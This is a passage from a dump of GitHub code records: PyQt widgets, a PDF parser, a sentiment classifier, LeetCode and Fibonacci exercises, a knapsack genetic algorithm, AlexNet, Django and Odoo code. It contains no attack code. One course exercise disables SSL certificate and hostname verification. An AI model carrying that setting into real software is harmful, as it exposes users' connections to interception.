self.toolbar.addAction(self.reinitAction)\n\n def reinitSize(self):\n self.scribbleArea.reinitSize()\n\n def saveImage(self, file):\n self.scribbleArea.saveImage(file, \"png\")\n\n def clear(self):\n self.scribbleArea.clearImage()\n\n def openImage(self, file):\n self.scribbleArea.openImage(file)\n\n def setImage(self, qimage):\n self.scribbleArea.setImage(qimage)\n\n def closeEvent(self, event):\n self.parentwdg.photowdg.clear()\n self.parentwdg.photowdg.setPixmap(self.scribbleArea.image)\n event.accept()\n\n\nclass ScribbleArea(QWidget):\n \"\"\"\n this scales the image but it's not good, too many refreshes really mess it up!!!\n \"\"\"\n\n def __init__(self, larg=500, haut=500, parent=None):\n super(ScribbleArea, self).__init__(parent)\n # self.setAttribute(QtCore.Qt.WA_StaticContents)\n self.setFixedSize(larg, haut)\n self.modified = False\n self.scribbling = False\n self.myPenWidth = 3\n self.myPenColor = QtCore.Qt.black\n imageSize = QtCore.QSize(larg, haut)\n # self.image = QtGui.QImage()\n self.image = QtGui.QImage(imageSize, QtGui.QImage.Format_RGB32)\n self.lastPoint = QtCore.QPoint()\n\n self.currentfilename = None\n\n def openImage(self, fileName=None):\n loadedImage = QtGui.QImage()\n if not loadedImage.load(fileName):\n return False\n self.currentfilename = fileName\n return self.setImage(loadedImage)\n\n def reinit(self):\n if self.currentfilename is not None:\n self.openImage(self.currentfilename)\n\n def reinitSize(self):\n self.setFixedSize(500, 500)\n self.mainWindow.resize(500, 500)\n imageSize = QtCore.QSize(500, 500)\n self.image = QtGui.QImage(imageSize, QtGui.QImage.Format_RGB32)\n\n def setImage(self, loadedImage):\n w = loadedImage.width()\n h = loadedImage.height()\n self.setFixedSize(w, h)\n self.mainWindow.resize(w, h)\n\n # newSize = loadedImage.size().expandedTo(self.size())\n # self.resizeImage(loadedImage, newSize)\n self.image = loadedImage\n self.modified = False\n self.update()\n return True\n\n def saveImage(self, fileName, fileFormat):\n if self.image.save(fileName, fileFormat):\n self.modified = False\n return True\n else:\n return False\n\n def setPenColor(self, newColor):\n self.myPenColor = newColor\n\n def setPenWidth(self, newWidth):\n self.myPenWidth = newWidth\n\n def clearImage(self):\n # print('celar')\n self.image.fill(QtGui.qRgb(255, 255, 255))\n self.modified = True\n self.update()\n\n def mousePressEvent(self, event):\n # print \"self.image.width() = %d\" % self.image.width()\n # print \"self.image.height() = %d\" % self.image.height()\n # print \"self.image.size() = %s\" % self.image.size()\n # print \"self.size() = %s\" % self.size()\n # print \"event.pos() = %s\" % event.pos()\n if event.button() == QtCore.Qt.LeftButton:\n self.lastPoint = event.pos()\n self.scribbling = True\n\n def mouseMoveEvent(self, event):\n if (event.buttons() & QtCore.Qt.LeftButton) and self.scribbling:\n self.drawLineTo(event.pos())\n\n def mouseReleaseEvent(self, event):\n if event.button() == QtCore.Qt.LeftButton and self.scribbling:\n self.drawLineTo(event.pos())\n self.scribbling = False\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.drawImage(event.rect(), self.image, event.rect())\n\n def drawLineTo(self, endPoint):\n painter = QtGui.QPainter(self.image)\n painter.setPen(\n QtGui.QPen(\n self.myPenColor,\n self.myPenWidth,\n QtCore.Qt.SolidLine,\n QtCore.Qt.RoundCap,\n QtCore.Qt.RoundJoin,\n )\n )\n painter.drawLine(self.lastPoint, endPoint)\n self.modified = True\n\n # rad = self.myPenWidth / 2 + 2\n # self.update(QtCore.QRect(self.lastPoint, endPoint).normalized().adjusted(-rad, -rad, +rad, +rad))\n self.update()\n self.lastPoint = QtCore.QPoint(endPoint)\n\n def print_(self):\n printer = QtGui.QPrinter(QtGui.QPrinter.HighResolution)\n\n printDialog = QtGui.QPrintDialog(printer, self)\n if printDialog.exec_() == QDialog.Accepted:\n painter = QtGui.QPainter(printer)\n rect = painter.viewport()\n size = self.image.size()\n size.scale(rect.size(), QtCore.Qt.KeepAspectRatio)\n painter.setViewport(rect.x(), rect.y(), size.width(), size.height())\n painter.setWindow(self.image.rect())\n painter.drawImage(0, 0, self.image)\n painter.end()\n\n def isModified(self):\n return self.modified\n\n def penColor(self):\n return self.myPenColor\n\n def penWidth(self):\n return self.myPenWidth\n","repo_name":"Artelia/Lamia","sub_path":"config/base3/qgswidgets/lamia_form_sketch.py","file_name":"lamia_form_sketch.py","file_ext":"py","file_size_in_byte":19056,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"}
+{"seq_id":"25863504416","text":"from pdfminer.pdfdocument import PDFDocument\r\nfrom pdfminer.pdfpage import PDFPage\r\nfrom pdfminer.pdfparser import PDFParser\r\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\r\nfrom pdfminer.converter import PDFPageAggregator\r\nfrom pdfminer.layout import LAParams, LTTextBox, LTTextLine, LTFigure\r\nimport os\r\nimport json\r\nfrom multiprocessing import Pool\r\n\r\ndef parse_text(layout):\r\n \"\"\"Function to recursively parse the layout tree.\"\"\"\r\n result = []\r\n if not hasattr(layout, '__iter__'):\r\n return result\r\n for lt_obj in layout:\r\n if isinstance(lt_obj, LTTextLine):\r\n bbox = lt_obj.bbox\r\n text = lt_obj.get_text().strip()\r\n if text != '':\r\n result += [(bbox, text)]\r\n else:\r\n result += parse_text(lt_obj)\r\n return result\r\n\r\n\r\ndef parse_case(case_path):\r\n \"\"\"Parse all the pdf files in the folder.\"\"\"\r\n try:\r\n result = {\r\n 'id': case_path.split('/')[-2], \r\n 'docs': {}\r\n }\r\n\r\n for name in os.listdir(case_path):\r\n if name[0] == '.' or name[-4:] != '.pdf':\r\n continue\r\n doc_id = name.split('.')[0]\r\n result['docs'][doc_id] = {'pages': {}}\r\n doc_obj = result['docs'][doc_id]\r\n\r\n path = case_path + name\r\n fp = open(path, 'rb')\r\n parser = PDFParser(fp)\r\n doc = PDFDocument(parser)\r\n rsrcmgr = PDFResourceManager()\r\n laparams = LAParams(detect_vertical=True, all_texts=True)\r\n device = PDFPageAggregator(rsrcmgr, laparams=laparams)\r\n interpreter = PDFPageInterpreter(rsrcmgr, device)\r\n\r\n for page in PDFPage.create_pages(doc):\r\n interpreter.process_page(page)\r\n layout = device.get_result()\r\n doc_obj['pages'][layout.pageid] = {\r\n 'size': (layout.width, layout.height),\r\n 'text': parse_text(layout)\r\n }\r\n # print(layout.width, layout.height)\r\n\r\n output = open(case_path + 'parsed.json', 'w')\r\n json.dump(result, output, indent=None)\r\n except:\r\n print(\"Error \" + case_path)\r\n\r\n return None\r\n\r\n\r\n\r\ndef main(base_path):\r\n case_list = []\r\n for direc in os.listdir(base_path):\r\n path = base_path + direc + '/'\r\n if not os.path.isdir(path):\r\n continue\r\n case_list.append(path)\r\n # Multiprocessing, for speed up\r\n pool = Pool(processes=8)\r\n output = pool.map(parse_case, case_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n main('Content/')\r\n","repo_name":"thomas0809/GraphIE","sub_path":"sentence-level/scripts-for-visual-ie/parse_pdf.py","file_name":"parse_pdf.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"7"}
+{"seq_id":"31404847930","text":"from PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot\nfrom PyQt5.QtWidgets import QDialog\nfrom ..view.Ui_progress import Ui_progressDialog\n\n\nclass ProgressDialog(QDialog, Ui_progressDialog):\n def __init__(self, parent=None):\n super(ProgressDialog, self).__init__(parent)\n self.setupUi(self)\n self.setWindowTitle('下载')\n self.listWidget.itemClicked.connect(self.item_clicked)\n\n # 下载切换\n def item_clicked(self, item):\n # 获取当前选中的item\n item = self.listWidget.selectedItems()[0]\n if item.text() == '正在下载':\n self.stackedWidget.setCurrentIndex(1)\n if item.text() == '已完成':\n self.stackedWidget.setCurrentIndex(0)\n\n\nif __name__ == '__main__':\n import sys\n from PyQt5.QtWidgets import QApplication\n\n app = QApplication(sys.argv)\n progressDialog = ProgressDialog()\n progressDialog.show()\n sys.exit(app.exec_())\n","repo_name":"jlx001/title_","sub_path":"app/function/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37626403816","text":"import numpy as np\nimport pandas as pd\nimport pymorphy2\nfrom nltk import RegexpTokenizer\nimport pickle\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\n\nall_feeds_file = \"all_train.csv\"\nmy_feeds_file = \"my.csv\"\n\nmorph = pymorphy2.MorphAnalyzer()\n\nall_feeds = pd.read_csv(\n all_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"text\"]\n).values\n\nall_labels = pd.read_csv(\n all_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"label\"]\n).values\n\nmy_feeds = pd.read_csv(\n my_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"text\"]\n).values\n\nmy_labels = pd.read_csv(\n my_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"label\"]\n).values\n\nY_train = []\nfor label in all_labels:\n Y_train.append(int(label[0]))\n\ny_true = []\nfor label in my_labels:\n y_true.append(int(label[0]))\n\n\ndef get_normal_form(one_word):\n return morph.parse(one_word)[0].normal_form\n\n\ntokenizer = RegexpTokenizer(r'\\w+')\n\n\n# массив всех слов в нормальной форме\ndef get_normal_form_words(feeds):\n normal_form_words = []\n for feed in feeds:\n words = tokenizer.tokenize(feed[0].lower())\n normal_form_words += list(map(get_normal_form, words))\n\n return normal_form_words\n\n\n# количество уникальных слов в массиве\ndef get_count_of_unique_words(words_array):\n return len(np.unique(words_array))\n\n\n# мешок слов\ndef get_words_bag(feeds, all_unique):\n bag = []\n for feed in feeds:\n feed_all_words = get_normal_form_words([feed])\n feed_bag = []\n for word in all_unique:\n count = feed_all_words.count(word)\n feed_bag.append(count)\n\n bag.append(feed_bag)\n\n return bag\n\n\ndef save_array_to_file(array, text):\n with open(text, 'wb') as f:\n pickle.dump(array, f)\n\n\ndef read_array_from_file(text):\n with open(text, 'rb') as f:\n return pickle.load(f)\n\n\nall_unique_words = np.unique(get_normal_form_words(all_feeds))\n\n# words_bag = get_words_bag(all_feeds, all_unique_words)\n# my_words_bag = get_words_bag(my_feeds, all_unique_words)\n\n# save_array_to_file(words_bag, \"all_bag.txt\")\n# save_array_to_file(my_words_bag, \"my_bag.txt\")\n\nwords_bag = read_array_from_file(\"all_bag.txt\")\nmy_words_bag = read_array_from_file(\"my_bag.txt\")\n\nreg_model = LogisticRegression(max_iter=100000)\nreg_model.fit(words_bag, Y_train)\n\ny_pred = reg_model.predict(my_words_bag)\n\n# метрики\nprint(accuracy_score(y_true, y_pred))\nprint(metrics.classification_report(y_true, y_pred, digits=3))\n\npositive_weights = dict(zip(all_unique_words, reg_model.coef_[2]))\nneutral_weights = dict(zip(all_unique_words, reg_model.coef_[1]))\nnegative_weights = dict(zip(all_unique_words, reg_model.coef_[0]))\n\n\ndef get_first_last_words(dict_weights):\n sorted_list = list({k: v for k, v in sorted(dict_weights.items(), key=lambda item: item[1], reverse=True)})\n first_10 = sorted_list[0:10]\n reversed_sorted_list = sorted_list[::-1]\n last_10 = reversed_sorted_list[0:10]\n print(first_10, last_10)\n\n\n# первые 10 и последние 10 слов для каждого класса\nget_first_last_words(positive_weights)\nget_first_last_words(negative_weights)\nget_first_last_words(negative_weights)\n","repo_name":"iapolya/NLP_ITIS_3","sub_path":"FilmReviews/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"22442279033","text":"\"\"\"\n Son una secuencia de números enteros los cuales siguen una regla sencilla:\n\nel primer elemento de la secuencia es igual a uno (Fib1 = 1)\nel segundo elemento también es igual a uno (Fib2 = 1)\ncada número después de ellos son la suman de los dos números anteriores (Fibi = Fibi-1 + Fibi-2)\nAquí están algunos de los primeros números en la serie Fibonacci:\n\nfib_1 = 1 fib_2 = 1 fib_3 = 1 + 1 = 2 fib_4 = 1 + 2 = 3 fib_5 = 2 + 3 = 5 fib_6 = 3 + 5 = 8 fib_7 = 5 + 8 = 13\n \"\"\"\n \ndef fib(n):\n if n < 1:\n return None\n if n < 3:\n return 1\n\n elem_1 = elem_2 = 1\n the_sum = 0\n for i in range(3, n + 1):\n the_sum = elem_1 + elem_2\n elem_1, elem_2 = elem_2, the_sum\n return the_sum\n\n\nfor n in range(1, 10): # probando\n print(n, \"->\", fib(n))\n\ndef factorial_function(n):\n if n < 0:\n return None\n if n < 2:\n return 1\n return n * factorial_function(n - 1)","repo_name":"Betelgeusep/python_apuntes","sub_path":"funciones/ejemplos_funciones/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"3932746951","text":"import urllib.request \r\nimport json\r\nimport ssl\r\n##The program will prompt for a URL, read the JSON data from that URL using\r\n##urllib and then parse and extract the comment counts from the JSON data,\r\n##compute the sum of the numbers in the file and enter the sum below:\r\n##Sample data: http://py4e-data.dr-chuck.net/comments_42.json (Sum=2553)\r\n##Actual data: http://py4e-data.dr-chuck.net/comments_792632.json (Sum ends with 12)\r\n\r\n# Ignore SSL certificate errors\r\nctx = ssl.create_default_context()\r\nctx.check_hostname = False\r\nctx.verify_mode = ssl.CERT_NONE\r\n\r\nurl = input('Enter - ')\r\nprint('Retriving...')\r\nconnection = urllib.request.urlopen(url)\r\ndata=connection.read().decode()\r\njs= json.loads(data)\r\n\r\n\r\n\r\ncount = 0\r\n\r\nfor item in js['comments']:\r\n count = count + int(item['count'])\r\n\r\nprint('count:', count)\r\n","repo_name":"mahta-khoobi/PythonSpecialization_Coursera","sub_path":"3- Accessing Web Data/5- JSON.py","file_name":"5- JSON.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39563042272","text":"from django.core.management.base import BaseCommand\nfrom counselor.models import *\n\nimport requests\n\nfrom ecocloud.tools import load_csv\n\nCONTINENTS = [\"asia\", \"north america\", \"europe\", \"south america\", \"africa\"]\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n load_csv()\n\n regions = requests.get(\"https://api.aiven.io/v1/clouds\").json()\n\n for region in regions[\"clouds\"]:\n region_object = Region.objects.filter(name=region[\"cloud_name\"])\n if not region_object.exists():\n if \"do\" not in region[\"cloud_name\"] and \"upcloud\" not in region[\"cloud_name\"]:\n country = region[\"cloud_description\"].lower().split(',')[0]\n if country in CONTINENTS:\n country = region[\"cloud_description\"].lower().split(',')[1][1:].split('-')[0][:-1]\n Region.objects.create(name=region[\"cloud_name\"], continent=region[\"geo_region\"], country=country)\n\n services = requests.get(\"https://api.aiven.io/v1/service_types\").json()\n\n for service_name in services[\"service_types\"]:\n service_object = Service.objects.create(name=service_name)\n for service_plan in services[\"service_types\"][service_name][\"service_plans\"]:\n service_plan_name = service_plan[\"service_plan\"]\n for region_name in service_plan[\"regions\"]:\n region = Region.objects.filter(name=region_name).first()\n ServiceRegionRelation.objects.create(\n region=region, service=service_object,\n service_plan=service_plan_name,\n price=float(service_plan[\"regions\"][region_name][\"price_usd\"]) * 730\n )\n","repo_name":"sepehrjavid/ecocloud","sub_path":"counselor/management/commands/fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"34661219357","text":"from random import randint, random\nfrom package.sga.organism import Organism\nfrom package.constants import CROSSOVER_OPERATOR, CROSSOVER_RATE, ELITISM_AMOUNT, GENERATION_THRESHOLD, ITEMS, MUTATION_RATE, POPULATION_SIZE, SELECTION_OPERATOR, TOURNAMENT_K, AsBit, Bit\n\n\nclass Population:\n generation_number: int\n organisms: list[Organism] # always sorted in order of fitness\n best_organism_ever: Organism # always updated\n\n def __init__(self):\n self.generation_number = 0\n self.organisms = [Population.gen_random_org()\n for _ in range(POPULATION_SIZE)]\n self.organisms.sort()\n self.best_organism_ever = self.get_best_organism()\n\n def perform_generation(self) -> None:\n self.generation_number += 1\n\n mutated_children: list[Organism] = []\n\n elites = self.__get_elites()\n for elite in elites:\n mutated_children.append(elite)\n\n parents: list[Organism] = self.__select_parents()\n while len(mutated_children) < POPULATION_SIZE:\n parent1 = parents[randint(1, len(parents)) - 1]\n parent2 = parents[randint(1, len(parents)) - 1]\n if random() < CROSSOVER_RATE:\n child1, child2 = Population.__crossover(parent1, parent2)\n mutated_children.append(child1)\n mutated_children.append(child2)\n else:\n mutated_children.append(parent1)\n mutated_children.append(parent2)\n\n for child in mutated_children:\n if random() < MUTATION_RATE:\n child.mutate()\n\n self.organisms = mutated_children\n self.organisms.sort()\n\n if self.get_best_organism().get_total_value() > self.best_organism_ever.get_total_value():\n self.best_organism_ever = self.get_best_organism()\n\n def is_finished(self):\n best_fitness = self.get_best_fitness()\n worst_fitness = self.get_worst_fitness()\n difference = abs(best_fitness - worst_fitness)\n less_than_1percent_difference = difference < .01 * \\\n min(abs(best_fitness), abs(worst_fitness))\n if GENERATION_THRESHOLD == -1:\n return less_than_1percent_difference\n return less_than_1percent_difference or self.generation_number >= GENERATION_THRESHOLD\n\n def get_best_organism(self) -> Organism:\n return self.organisms[-1]\n\n def get_best_fitness(self) -> int:\n return self.organisms[-1].fitness\n\n def get_worst_fitness(self) -> int:\n return self.organisms[0].fitness\n\n @staticmethod\n def __crossover(parent1: Organism, parent2: Organism) -> tuple[Organism, Organism]:\n def uniform(parent1: Organism, parent2: Organism):\n mask = Population.__gen_random_bitstring(len(parent1.chromosome))\n return crossover_from_mask(parent1, parent2, mask)\n\n def single_point(parent1: Organism, parent2: Organism):\n point = randint(1, len(parent1.chromosome)-1)\n mask = [0 if i < point else 1 for i in range(\n len(parent1.chromosome))]\n return crossover_from_mask(parent1, parent2, mask) # type:ignore\n\n def double_point(parent1: Organism, parent2: Organism):\n point1, point2 = sorted(\n [randint(1, len(parent1.chromosome)-1) for _ in range(2)])\n mask = [1 if i >= point1 and i <\n point2 else 0 for i in range(len(parent1.chromosome))]\n return crossover_from_mask(parent1, parent2, mask) # type:ignore\n\n def crossover_from_mask(parent1: Organism, parent2: Organism, mask: list[Bit]) -> tuple[Organism, Organism]:\n chromosome1: list[Bit] = []\n chromosome2: list[Bit] = []\n for i in range(len(mask)):\n if mask[i] == 0:\n chromosome1.append(parent1.chromosome[i])\n chromosome2.append(parent2.chromosome[i])\n else:\n chromosome1.append(parent2.chromosome[i])\n chromosome2.append(parent1.chromosome[i])\n return Organism(chromosome1), Organism(chromosome2)\n\n crossover_operators = {'uniform': uniform,\n 'single point': single_point, 'double point': double_point}\n return crossover_operators[CROSSOVER_OPERATOR](parent1, parent2)\n\n def __get_elites(self) -> list[Organism]:\n elites: list[Organism] = []\n for i in range(1, ELITISM_AMOUNT+1):\n elites.append(self.organisms[-i])\n return elites\n\n def __select_parents(self) -> list[Organism]:\n def roulette(self: Population) -> list[Organism]:\n # add constant to all fitness values so they are all positive\n lowest_fitness = self.get_worst_fitness()\n shifter: int = 0\n if lowest_fitness <= 0:\n shifter = abs(lowest_fitness) + 1\n shifted_fitnesses = list(\n map(lambda x: x + shifter, [org.fitness for org in self.organisms]))\n total_fitness = sum(shifted_fitnesses)\n\n parents: list[Organism] = []\n for _ in range(POPULATION_SIZE - ELITISM_AMOUNT):\n spin = randint(1, total_fitness)\n for i in range(len(shifted_fitnesses)):\n spin -= shifted_fitnesses[i]\n if spin <= 0:\n parents.append(self.organisms[i])\n break\n return parents\n\n def tournament(self: Population) -> list[Organism]:\n parents: list[Organism] = []\n for _ in range(POPULATION_SIZE - ELITISM_AMOUNT):\n fighter1 = self.organisms[randint(1, len(self.organisms)) - 1]\n fighter2 = self.organisms[randint(1, len(self.organisms)) - 1]\n if random() < TOURNAMENT_K:\n parents.append(max(fighter1, fighter2))\n else:\n parents.append(min(fighter1, fighter2))\n return parents\n\n selection_operators = {\n 'roulette': roulette, 'tournament': tournament} # type: ignore\n return selection_operators[SELECTION_OPERATOR](self)\n\n @staticmethod\n def gen_random_org() -> Organism:\n return Organism(Population.__gen_random_bitstring(len(ITEMS)))\n\n @staticmethod\n def __gen_random_bitstring(length: int) -> list[Bit]:\n return [AsBit(randint(0, 1)) for _ in range(length)]\n","repo_name":"parkerbedlan/knapsack-evolutionary-computation","sub_path":"package/sga/population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7158199367","text":"\"\"\"\nDefines CNN architectures\n\"\"\"\n\nimport tensorflow as tf\nfrom tfutils import model_tool\n\ndef alexnet(images, train=True, norm=True, seed=0, **kwargs):\n \"\"\"\n Alexnet\n \"\"\"\n m = model_tool.ConvNet(seed=seed)\n\n conv_kwargs = {\"add_bn\": False, \"init\": \"xavier\", \"weight_decay\": 0.0001}\n pool_kwargs = {\"pool_type\": \"maxpool\"}\n fc_kwargs = {\"init\": \"trunc_norm\", \"weight_decay\": 0.0001, \"stddev\": 0.01}\n\n dropout = 0.5 if train else None\n\n m.conv(96, 11, 4, padding=\"VALID\", layer=\"conv1\",\n in_layer=images, **conv_kwargs)\n if norm:\n m.lrn(depth_radius=5, bias=1, alpha=0.0001, beta=0.75, layer=\"lrn1\")\n m.pool(3, 2, layer=\"pool1\", **pool_kwargs)\n\n m.conv(256, 5, 1, layer=\"conv2\", **conv_kwargs)\n if norm:\n m.lrn(depth_radius=5, bias=1, alpha=0.0001, beta=0.75, layer=\"lrn2\")\n m.pool(3, 2, layer=\"pool2\", **pool_kwargs)\n\n m.conv(384, 3, 1, layer=\"conv3\", **conv_kwargs)\n m.conv(384, 3, 1, layer=\"conv4\", **conv_kwargs)\n\n m.conv(256, 3, 1, layer=\"conv5\", **conv_kwargs)\n m.pool(3, 2, layer=\"pool5\", **pool_kwargs)\n\n m.fc(4096, dropout=dropout, bias=0.1, layer=\"fc6\", **fc_kwargs)\n m.fc(4096, dropout=dropout, bias=0.1, layer=\"fc7\", **fc_kwargs)\n m.fc(1000, activation=None, dropout=None, bias=0, layer=\"fc8\", **fc_kwargs)\n\n return m\n\n","repo_name":"dawnfinzi/CS431","sub_path":"alexnet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14196780885","text":"# from pudb import set_trace; set_trace()\nfrom typing import List\nimport math\n\n\nclass Solution1:\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n \"\"\"LeetCode 799\n\n Terrible performance. I solved this one two years ago, but couldn't\n solve it today. Granted, I was tight on time, but I was not on the\n right path. The way I was trying to simulate was not correct, because\n I tried to find out when the parent cup gets filled and analyze the\n filling situation per cup for child afterwards. This is vastly\n complicated. I had to see the solution, which uses another way to\n simulate. We keep track of the amount of fluid going through each cup.\n And since the amount spilled is deterministic based on the amount that\n goes through a cup, we can easily compute the amount the children will\n get.\n\n O(N^2), N is the number of glasses.\n \"\"\"\n glasses = [[0] * c for c in range(1, 102)]\n glasses[0][0] = poured\n for r in range(query_row + 1):\n for j, g in enumerate(glasses[r]):\n if g > 1:\n glasses[r + 1][j] += (g - 1) / 2\n glasses[r + 1][j + 1] += (g - 1) / 2\n glasses[r][j] = 1\n return glasses[query_row][query_glass]\n\n\nclass Solution2:\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n \"\"\"1D DP to save our face.\n\n 108 ms, 88% ranking\n \"\"\"\n glasses = [0] * 100\n glasses[0] = poured\n for r in range(query_row):\n temp = 0\n for j in range(r + 1):\n spill = max((glasses[j] - 1) / 2, 0)\n glasses[j] = spill + temp\n temp = spill\n glasses[r + 1] = temp\n return min(glasses[query_glass], 1.0)\n\n\n\nclass Solution3:\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n \"\"\"Smarter 1D DP\n \"\"\"\n glasses = [0] * (query_row + 1)\n glasses[0] = poured\n for r in range(1, query_row + 1):\n for j in range(r, -1, -1):\n glasses[j] = max((glasses[j] - 1) / 2, 0) + max((glasses[j - 1] - 1) / 2, 0)\n return min(glasses[query_glass], 1.0)\n\n\nsol = Solution3()\ntests = [\n (1, 1, 1, 0.0),\n (2, 1, 1, 0.5),\n (100000009, 33, 17, 1.0),\n (1, 1, 0, 0),\n]\n\nfor i, (poured, query_row, query_glass, ans) in enumerate(tests):\n res = sol.champagneTower(poured, query_row, query_glass)\n if math.isclose(res, ans):\n print(f'Test {i}: PASS')\n else:\n print(f'Test {i}; Fail. Ans: {ans}, Res: {res}')\n","repo_name":"FanchenBao/leetcode","sub_path":"2022_03_challenge/03_04_2022.py","file_name":"03_04_2022.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"26749168475","text":"class Archivo:\n def __init__(self, nombre, extension, delimitador):\n self.nombre = nombre\n self.extension = extension\n self.delimitador = delimitador\n self.texto = \"\"\n\n def get_nombre(self):\n return (self.nombre)\n\n def get_extension(self):\n return (self.extension)\n\n def abrir_Archivo(self):\n filas = open(self.nombre + \".\" + self.extension, \"r\")\n self.texto = filas.readline()\n texto_delimitado = self.texto.replace(\" \", delimitador)\n print(texto_delimitado)\n\n\nnombre_archivo = str(input(\"escriba el nombre del archivo: \"))\next = str(input(\"ingrese la extension: \"))\ndelimitador = str(input(\"ingrese un delimitador: \"))\narchivo = Archivo(nombre_archivo, ext, delimitador)\narchivo.abrir_Archivo()\n","repo_name":"pipo508/Trabajos-Practicos-Computaci-n","sub_path":"tp3/ejercicio 8/ejercicio8.py","file_name":"ejercicio8.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"74756294335","text":"from odoo import models, fields, _\nfrom odoo.exceptions import RedirectWarning, UserError, ValidationError, AccessError\nfrom odoo.tools.misc import formatLang, format_date, get_lang\nfrom odoo.tools import float_compare, date_utils, email_split, email_re\nfrom collections import defaultdict\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n # original def _post, copiado y cambiado el nombre y modificado para que no postee la factura de pos.order\n def _post_global_invoices(self, soft=True):\n \"\"\"Post/Validate the documents.\n\n Posting the documents will give it a number, and check that the document is\n complete (some fields might not be required if not posted but are required\n otherwise).\n If the journal is locked with a hash table, it will be impossible to change\n some fields afterwards.\n\n :param soft (bool): if True, future documents are not immediately posted,\n but are set to be auto posted automatically at the set accounting date.\n Nothing will be performed on those documents before the accounting date.\n :return Model: the documents that have been posted\n \"\"\"\n if soft:\n future_moves = self.filtered(lambda move: move.date > fields.Date.context_today(self))\n future_moves.auto_post = True\n for move in future_moves:\n msg = _('This move will be posted at the accounting date: %(date)s', date=format_date(self.env, move.date))\n move.message_post(body=msg)\n to_post = self - future_moves\n else:\n to_post = self\n\n # `user_has_group` won't be bypassed by `sudo()` since it doesn't change the user anymore.\n if not self.env.su and not self.env.user.has_group('account.group_account_invoice'):\n raise AccessError(_(\"You don't have the access rights to post an invoice.\"))\n for move in to_post:\n if move.partner_bank_id and not move.partner_bank_id.active:\n raise UserError(_(\"The recipient bank account link to this invoice is archived.\\nSo you cannot confirm the invoice.\"))\n if move.state == 'posted':\n raise UserError(_('The entry %s (id %s) is already posted.') % (move.name, move.id))\n if not move.line_ids.filtered(lambda line: not line.display_type):\n raise UserError(_('You need to add a line before posting.'))\n if move.auto_post and move.date > fields.Date.context_today(self):\n date_msg = move.date.strftime(get_lang(self.env).date_format)\n raise UserError(_(\"This move is configured to be auto-posted on %s\", date_msg))\n\n if not move.partner_id:\n if move.is_sale_document():\n raise UserError(_(\"The field 'Customer' is required, please complete it to validate the Customer Invoice.\"))\n elif move.is_purchase_document():\n raise UserError(_(\"The field 'Vendor' is required, please complete it to validate the Vendor Bill.\"))\n\n if move.is_invoice(include_receipts=True) and float_compare(move.amount_total, 0.0, precision_rounding=move.currency_id.rounding) < 0:\n raise UserError(_(\"You cannot validate an invoice with a negative total amount. You should create a credit note instead. Use the action menu to transform it into a credit note or refund.\"))\n\n # Handle case when the invoice_date is not set. In that case, the invoice_date is set at today and then,\n # lines are recomputed accordingly.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if not move.invoice_date:\n if move.is_sale_document(include_receipts=True):\n move.invoice_date = fields.Date.context_today(self)\n move.with_context(check_move_validity=False)._onchange_invoice_date()\n elif move.is_purchase_document(include_receipts=True):\n raise UserError(_(\"The Bill/Refund date is required to validate this document.\"))\n\n # When the accounting date is prior to the tax lock date, move it automatically to the next available date.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if (move.company_id.tax_lock_date and move.date <= move.company_id.tax_lock_date) and (move.line_ids.tax_ids or move.line_ids.tax_tag_ids):\n move.date = move._get_accounting_date(move.invoice_date or move.date, True)\n move.with_context(check_move_validity=False)._onchange_currency()\n\n # Create the analytic lines in batch is faster as it leads to less cache invalidation.\n to_post.mapped('line_ids').create_analytic_lines()\n\n for move in to_post:\n move.message_subscribe([p.id for p in [move.partner_id] if p not in move.sudo().message_partner_ids])\n\n # Compute 'ref' for 'out_invoice'.\n if move._auto_compute_invoice_reference():\n to_write = {\n 'payment_reference': move._get_invoice_computed_reference(),\n 'line_ids': []\n }\n for line in move.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable')):\n to_write['line_ids'].append((1, 